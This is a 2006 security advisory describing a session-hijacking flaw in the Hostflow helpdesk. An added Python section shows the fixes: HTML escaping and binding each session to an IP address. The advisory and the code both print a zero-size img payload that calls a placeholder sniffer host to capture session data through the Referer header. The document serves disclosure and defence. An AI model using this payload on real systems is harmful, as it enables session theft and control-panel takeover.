by r0t, der4444, cembo, VietMafia

Tuesday, June 27, 2006

Hostflow vuln.

###############################################
Vuln. discovered by: r0t
Date: 27 June 2006
Vendor: http://www.hostflow.com/
Affected versions: 2.2.1-15 and previous
###############################################

Vuln. Description:

Hostflow contains a flaw which could allow a remote attacker to hijack user sessions. A remote attacker can retrieve the authentication information needed to hijack a user session by including a URL link within a helpdesk message, because by default there is no IP address verification on the session. This would allow the attacker to take control of the victim's control panel.


example:

1. post:
(img src="http://[sniffer-host]/r0t.gif" width="0" height="0")
note: change "(" to "<" and ")" to ">"

2. It also works with a simple referral URL. For manual testing, use HTML code to create a hyperlink to a resource which will show you the referrer URLs; for example, a hit counter or statistics application does this well.

###############################################
Solution:
Edit the source code to ensure that helpdesk message input is properly sanitised before it is rendered.
###############################################
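The following is an added illustration of the two defensive measures the advisory and the vendor comment touch on: HTML-escaping helpdesk message bodies so an embedded image or hyperlink is rendered as text rather than fetched by the victim's browser, and binding a session token to the client IP it was issued to. This is example code written for this page, not Hostflow's own code; the function names, the in-memory session store and the sample addresses are assumptions. The sample message is the advisory's own payload with the parentheses already changed to angle brackets as its note instructs.

```python
import html
import re
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed sample input: the helpdesk message body from the advisory above,
# with "(" and ")" replaced by "<" and ">" as the advisory's note says.
SAMPLE_MESSAGE = '<img src="http://[sniffer-host]/r0t.gif" width="0" height="0">'


def sanitize_helpdesk_message(text: str) -> str:
    """Escape every HTML metacharacter so a helpdesk message renders as plain text.

    Escaping (instead of trying to strip "bad" tags) is the simplest correct fix:
    an attacker-supplied <img> or <a> becomes literal text, so the victim's
    browser never issues a request whose Referer could carry session data.
    """
    return html.escape(text, quote=True)


# Anything a browser would start parsing as a tag: "<", optional "/", a letter.
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z]")


def contains_markup(rendered: str) -> bool:
    """True if the string still contains something a browser would treat as a tag."""
    return TAG_RE.search(rendered) is not None


@dataclass
class Session:
    token: str
    user: str
    bound_ip: str  # client IP the session was created from (assumed design)


# Hypothetical in-memory session store; a real control panel would persist this.
_SESSIONS: Dict[str, Session] = {}


def create_session(user: str, client_ip: str) -> str:
    """Issue an unguessable token and remember which client IP it belongs to."""
    token = secrets.token_urlsafe(32)
    _SESSIONS[token] = Session(token, user, client_ip)
    return token


def resolve_session(token: str, client_ip: str) -> Optional[Session]:
    """Return the session only if the token is known AND the request comes from
    the IP it was bound to; otherwise None, i.e. treat the request as logged out.

    This is the "IP check" the vendor comment refers to: a token that leaks to
    a third party via a Referer header is useless from another address.
    """
    session = _SESSIONS.get(token)
    if session is None or session.bound_ip != client_ip:
        return None
    return session


def render_helpdesk_message(token: str, client_ip: str, message: str) -> Optional[str]:
    """Combined request path: reject unbound sessions, then render escaped text."""
    if resolve_session(token, client_ip) is None:
        return None
    return sanitize_helpdesk_message(message)


if __name__ == "__main__":
    tok = create_session("alice", "203.0.113.10")  # constructed sample addresses
    print(render_helpdesk_message(tok, "203.0.113.10", SAMPLE_MESSAGE))
    print(render_helpdesk_message(tok, "198.51.100.7", SAMPLE_MESSAGE))  # None
```

The IP binding is a mitigation, not a substitute for escaping: users behind a shared proxy or NAT share an address, and an attacker on the same network still passes the check. Escaping the message body removes the leak itself, and is the fix the advisory's solution section asks for.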
More information @ unsecured-systems.com/forum/

1 comment:

Anonymous said...

By default, an IP check is done and a session is only valid for a specific IP.

By the way, this issue has been fixed in Hostflow 2.5.2-0, released on July 10, 2006.


The hostflow technical support.

9:44 AM

Copyright (c) 2006 Pridels Sec Crew